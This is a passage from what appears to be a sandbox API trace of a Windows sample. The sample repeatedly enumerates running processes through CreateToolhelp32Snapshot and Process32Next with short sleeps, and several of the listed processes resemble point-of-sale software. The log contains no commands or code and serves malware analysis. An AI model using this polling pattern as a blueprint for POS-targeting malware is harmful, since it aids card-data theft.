hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0224.149] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0224.150] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0224.153] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0224.154] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0224.161] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0224.163] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0224.165] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0224.167] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0224.168] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.170] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0224.172] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0224.173] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.175] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.177] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0224.178] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.180] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0224.181] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0224.183] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0224.185] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.186] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x518, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0224.188] CloseHandle (hObject=0x1eb8) returned 1 [0224.188] Sleep (dwMilliseconds=0x64) [0224.229] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0224.268] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.269] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.271] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.272] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.274] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.284] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.288] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.289] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.291] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.292] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.297] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.302] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0224.306] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.308] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.319] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.321] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.322] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.324] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.325] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.327] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.329] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0224.330] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.332] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0224.333] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.475] Sleep (dwMilliseconds=0x64) [0224.520] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0224.534] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.683] Sleep (dwMilliseconds=0x64) [0224.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0224.734] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.889] Sleep (dwMilliseconds=0x64) [0224.933] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0225.009] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.181] Sleep (dwMilliseconds=0x64) [0225.445] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0225.457] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.677] Sleep (dwMilliseconds=0x64) [0225.777] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1eb8 [0225.796] Process32First (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.958] Sleep (dwMilliseconds=0x64) [0226.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d98 [0226.048] Process32First (in: hSnapshot=0x1d98, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.196] Sleep (dwMilliseconds=0x64) [0226.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d98 [0226.276] Process32First (in: hSnapshot=0x1d98, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d98 [0226.683] Process32First (in: hSnapshot=0x1d98, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.972] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d98 [0226.987] Process32First (in: hSnapshot=0x1d98, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.163] Sleep (dwMilliseconds=0x64) [0227.243] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0227.255] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.496] Sleep (dwMilliseconds=0x64) [0227.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0227.556] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.748] Sleep (dwMilliseconds=0x64) [0227.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0227.798] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.962] Sleep (dwMilliseconds=0x64) [0228.049] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0228.065] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.268] Sleep (dwMilliseconds=0x64) [0228.306] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0228.318] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.517] Sleep (dwMilliseconds=0x64) [0228.553] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0228.603] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.864] Sleep (dwMilliseconds=0x64) [0228.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0228.917] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.067] Sleep (dwMilliseconds=0x64) [0229.103] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0229.155] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.348] Sleep (dwMilliseconds=0x64) [0229.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0229.396] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.584] Sleep (dwMilliseconds=0x64) [0229.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0229.634] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.852] Sleep (dwMilliseconds=0x64) [0229.870] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0229.883] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.998] Sleep (dwMilliseconds=0x64) [0230.057] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0230.075] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.448] Sleep (dwMilliseconds=0x64) [0230.525] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0230.536] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.712] Sleep (dwMilliseconds=0x64) [0230.751] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0230.765] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.992] Sleep (dwMilliseconds=0x64) [0231.045] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0231.059] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.321] Sleep (dwMilliseconds=0x64) [0231.360] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0231.372] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.540] Sleep (dwMilliseconds=0x64) [0231.583] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0231.639] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.931] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0231.947] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, 